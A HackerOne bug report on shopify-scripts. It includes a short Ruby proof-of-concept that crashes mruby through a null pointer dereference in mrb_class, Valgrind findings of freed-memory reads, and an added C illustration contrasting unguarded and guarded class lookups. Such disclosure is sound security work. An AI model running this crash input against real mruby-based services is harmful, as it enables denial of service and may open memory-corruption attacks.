shopify-scripts: Null pointer dereference in mrb_class

2017-03-24T17:27:15
ID H1:215891
Type hackerone
Reporter dgaletic
Modified 2017-04-15T14:45:08

Description

PoC

The following demonstrates a crash:

if def class
  A
  ensure
    e rescue 0
  end
end
[].map.a

Debug info

The crash happens due to a null pointer dereference in mrb_class, class.h:50.

class.h:50:    return mrb_obj_ptr(v)->c;

Valgrind shows several reads inside free'd blocks.
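The crashing line reads the class pointer `c` through an object pointer it never checks. The following is an added illustration in C, not mruby's own code: it models a tagged value with a hypothetical, simplified layout (`struct value`, `struct robject`, `OBJ_PTR`, and the singleton class globals are all assumed here) and places the unguarded accessor, shaped like the line quoted above, beside a guarded variant that returns NULL to the caller instead of dereferencing a NULL object pointer.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical, simplified model of an mruby-style tagged value. This is
 * added illustration, not mruby's real mrb_value/RObject layout: a value is
 * either an immediate (nil, false, true, fixnum) or a tagged pointer to a
 * heap object that carries its class pointer `c`. */
enum vtype { TT_NIL, TT_FALSE, TT_TRUE, TT_FIXNUM, TT_OBJECT };

struct rclass  { const char *name; };
struct robject { struct rclass *c; };

struct value {
    enum vtype tt;
    union { long i; struct robject *p; } u;
};

/* Assumed singleton classes for the immediates (in mruby these hang off the
 * interpreter state; here they are plain globals for the demonstration). */
static struct rclass nil_class    = { "NilClass" };
static struct rclass false_class  = { "FalseClass" };
static struct rclass true_class   = { "TrueClass" };
static struct rclass fixnum_class = { "Integer" };

#define OBJ_PTR(v) ((v).u.p)

/* Unguarded accessor shaped like the report's crashing line
 * (`return mrb_obj_ptr(v)->c;`). If the tag says "object" but the pointer
 * is NULL, the default case dereferences NULL and the process faults. */
struct rclass *class_of_unguarded(struct value v) {
    switch (v.tt) {
    case TT_NIL:    return &nil_class;
    case TT_FALSE:  return &false_class;
    case TT_TRUE:   return &true_class;
    case TT_FIXNUM: return &fixnum_class;
    default:        return OBJ_PTR(v)->c;
    }
}

/* Guarded accessor: the object branch checks the pointer before using it
 * and hands the caller NULL instead of crashing; callers must then treat a
 * NULL result as "no class available". */
struct rclass *class_of_guarded(struct value v) {
    switch (v.tt) {
    case TT_NIL:    return &nil_class;
    case TT_FALSE:  return &false_class;
    case TT_TRUE:   return &true_class;
    case TT_FIXNUM: return &fixnum_class;
    default:
        if (OBJ_PTR(v) == NULL) return NULL;
        return OBJ_PTR(v)->c;
    }
}

/* Convenience for callers: a printable class name that never faults. */
const char *class_name(struct value v) {
    struct rclass *c = class_of_guarded(v);
    return c ? c->name : "<no class: null object pointer>";
}

/* Constructed sample values used below. */
struct value make_nil(void) { struct value v = { TT_NIL, { 0 } }; return v; }
struct value make_obj(struct robject *p) {
    struct value v; v.tt = TT_OBJECT; v.u.p = p; return v;
}

/* Builds one well-formed object and reports whether the guarded lookup
 * resolves its class correctly (1) or not (0). */
int guarded_lookup_resolves_real_object(void) {
    struct rclass array_class = { "Array" };
    struct robject arr = { &array_class };
    return class_of_guarded(make_obj(&arr)) == &array_class;
}

int main(void) {
    printf("nil      -> %s\n", class_name(make_nil()));
    printf("null ptr -> %s\n", class_name(make_obj(NULL)));
    printf("object ok -> %d\n", guarded_lookup_resolves_real_object());
    /* class_of_unguarded(make_obj(NULL)) would segfault here, as in the report. */
    return 0;
}
```

The guard covers only the NULL case named in the title. The freed-block reads that Valgrind shows point at a lifetime problem as well: a pointer to an object the collector has already reclaimed is non-NULL and passes this check, so the object has to be kept reachable for as long as the value is used, which a pointer check cannot substitute for.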

Test platform

  • Linux Mint 17.3 (Cinnamon 64-bit), built with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3)

mruby SHA: 051e40c0493f2de332f5439e3230c9fe6958bf1a

Thank you,
Dinko Galetic
Denis Kasak